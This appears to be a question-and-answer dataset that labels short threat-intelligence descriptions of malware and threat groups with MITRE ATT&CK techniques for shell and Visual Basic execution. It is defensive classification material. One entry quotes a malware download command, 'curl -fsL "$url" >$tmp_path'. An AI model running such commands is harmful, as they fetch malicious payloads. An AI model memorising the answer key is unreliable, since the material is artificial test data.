+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda can launch an interface where it can execute several commands on the victim’s PC.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can launch a reverse command shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: adbupd can run a copy of cmd.exe.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ccf32 has used `cmd.exe` for archiving data and deleting files.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: cmd is used to execute programs and other actions at the command-line interface.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: hcdLoader provides command-line access to the compromised system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: httpclient opens cmd.exe on the victim.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT has command line access.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT can launch a command shell interface for executing commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: xCaon has a command to start an interactive shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: zwShell can launch command-line shells.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 executed file /bin/pwd in activity exploiting CVE-2019-19781 against Citrix devices.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has used shell scripts for execution.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor can execute payloads via shell scripting.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has used shell scripts to execute commands after installation and set persistence mechanisms.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore has leveraged /bin/sh and /bin/bash to execute commands on the victim machine.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER provides a BusyBox reverse shell for command and control.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CallMe has the capability to create a reverse shell on victims.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaos provides a reverse shell connection on 8338/TCP, encrypted via AES.","Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CoinTicker executes a bash script to establish a reverse shell.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CookieMiner has used a Unix shell script to run a series of commands targeting macOS.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi is capable of creating a remote Bash shell and executing commands.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Doki has executed shell scripts with /bin/sh.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Drovorub can execute arbitrary commands as root on a compromised system.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Linux has a command to execute a shell command on the system.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fysbis has the ability to create and execute commands in a remote shell for CLI.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert can use shell scripts for execution, such as /bin/sh -c.","Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has used shell scripts for execution.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar uses /bin/bash to execute commands on the victim’s machine.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing has used Unix shell scripts to execute commands in the victim environment.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kobalos can spawn a new pseudo-terminal and execute arbitrary commands at the command prompt.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner used shell scripts to launch various services and to start/stop the QEMU virtualization.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa can execute supplied shell commands and uses bash scripts to perform additional actions.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has the ability to use /bin/bash and /bin/sh to execute commands.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NKAbuse is initially installed and executed through an initial shell script.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX/Shlayer can use bash scripts to check the macOS version, download payloads, and extract bytes from files. OSX/Shlayer uses the command sh -c tail -c +1381... to extract bytes at an offset from a specified file. OSX/Shlayer uses the curl -fsL ""$url"" >$tmp_path command to download malicious payloads into a temporary directory.","Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D uses a shell script as the main executable inside an app bundle and drops an embedded base64-encoded payload to the /tmp folder.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PACEMAKER can use a simple bash script for execution.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PITSTOP has the ability to receive shell commands over a Unix domain socket.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PULSECHECK can use Unix shell script for command execution.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin can execute remote commands using bash scripts.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proton uses macOS' .command file type to script actions.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap has used pm.sh to download and install its main payload.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian has the ability to use /bin/sh to execute commands.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WindTail can use the open command to execute an application.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET uses a shell script to execute Mach-o files and osacompile commands such as, osacompile -x -o xcode.app main.applescript.","Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIPLINE can use `/bin/sh` to create a reverse shell and execute commands.,"Tecnique: T1059.004 Command and Scripting Interpreter: Unix Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team installed a VBA script called `vba_macro.exe`. This macro dropped `FONTCACHE.DAT`, the primary BlackEnergy implant; `rundll32.exe`, for executing the malware; `NTUSER.log`, an empty file; and desktop.ini, the default file used to determine folder displays on Windows machines.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team created VBScripts to run on an SSH server.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0011, Transparent Tribe used malicious VBA macros within a lure document as part of the Crimson malware installation process onto a compromised host.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors used Word documents that prompted the victim to enable macros and run a Visual Basic script.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During FunnyDream, the threat actors used a Visual Basic script to run remote commands.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors executed an encoded VBScript file using `wscript` and wrote the decoded output to a text file.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group executed a VBA written malicious macro after victims download malicious DOTM files; Lazarus Group also used Visual Basic macro code to extract a double Base64 encoded DLL implant.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dust Storm, the threat actors used Visual Basic scripts.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Honeybee, the threat actors used a Visual Basic script embedded within a Word document to download an implant.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Sharpshooter, the threat actors used a VBA macro to execute a simple downloader that installed Rising Sun.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used VBScript to conduct reconnaissance on targeted systems.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For the SolarWinds Compromise, APT29 wrote malware such as Sibot in Visual Basic.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT-C-36 has embedded a VBScript within a malicious Word document which is executed upon the document opening.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used macros, COM scriptlets, and VBS scripts.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used VBScript to initiate the delivery of payloads.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 executes shellcode and a VBA script to decode Base64 strings.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used VBScript to execute commands and other operational tasks.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has utilized malicious VBS scripts in malware.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used VBS and VBE scripts for execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has used VBScript to execute malicious code.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca used VBA scripts.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has used VBS scripts for code execution on comrpomised machines.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN4 has used VBA macros to display a dialog box and collect victim credentials.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 used VBS scripts to help perform tasks on the victim's machine.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has embedded malicious macros in document templates, which executed VBScript. Gamaredon Group has also delivered Microsoft Outlook VBA projects with embedded macros.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group has used macros in Spearphishing Attachments as well as executed VBScripts on victim machines.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used a VisualBasic script named `MicrosoftUpdator.vbs` for execution of a PowerShell keylogger.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa has used VBScript code on the victim's machine.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has used VBScript to execute malicious commands and payloads.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used Visual Basic to download malicious payloads. Kimsuky has also used malicious VBA macros within maldocs disguised as forms that trigger when a victim types any content into the lure.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used VBA and embedded macros in Word documents to execute malicious code.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has used VBScript to execute malicious code.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used VBScript.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has embedded malicious macros within spearphishing attachments to download additional files.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound malware has used VBS scripts for execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malteiro has utilized a dropper containing malicious VBS scripts.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats used various implants, including those built with VBScript, on target machines.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used VBScript files to execute its POWERSTATS payload, as well as macros.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has embedded VBScript components in LNK files to download additional files and automate collection.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used VBScript macros for execution on compromised hosts.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork used Visual Basic Scripts (VBS) on victim machines.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rancor has used VBS scripts as well as embedded macros for execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has created VBScripts to run an SSH server.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy has sent Microsoft Office Publisher documents to victims that have embedded malicious macros that execute an hta file via calling `mshta.exe`.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used VBScript to drop and execute malware loaders.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used VBS scripts.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used VBS files to execute or establish persistence for additional payloads, often using file names consistent with email themes or mimicking system functionality.","Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA459 has a VBScript for execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used VBS for code execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Transparent Tribe has crafted VBS-based malicious documents.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used VBS scripts throughout its operations.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIRTE has used VBScript in its operations.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used Visual Basic 6 (VB6) payloads.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth has used malicious VBS e-mail attachments for execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig has used VBS to install its downloader component and malicious documents with VBA macro code.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook has used malicious VBA code against the target system.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal's dropper creates VBS scripts on the victim’s machine.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can create a Visual Basic script to enable persistence.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has used VBscript to execute malicious code.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use VBA to perform execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie executes VBS scripts.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DanBot can use a VBA macro embedded in an Excel file to drop the payload.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate initial infection mechanisms include masquerading as pirated media that launches malicious VBScript on the victim.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Donut can generate shellcode outputs that execute via VBScript.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Windows has a command to execute VBS scripts on the victim’s machine.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ferocious has the ability to use Visual Basic scripts for execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro can execute malicious VBA macros embedded in .xlsm files.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can use VBScript to execute malicious code.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: One version of Helminth consists of VBScript scripts.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has used obfuscated VBA string expressions.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JCry has used VBS scripts.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JSS Loader can download and execute VBScript files.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Javali has used embedded VBScript to download malicious payloads from C2.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS has used VBScript to call wscript to execute a PowerShell command.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kerrdown can use a VBS base64 decoder function published by Motobit.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy uses VBS scripts for installing files and performing execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode .,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has used VBS scripts and XLS macros for execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack has used VBA macros in Microsoft Word attachments to drop additional files to the host.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Melcoz can use VBS scripts to execute malicious DLLs.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has used VBS code on victims’ systems.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu’s dropper uses VBS files to install payloads and perform execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has been executed through use of VBScripts.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanHaiShu executes additional VBScript code on the victim's machine.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
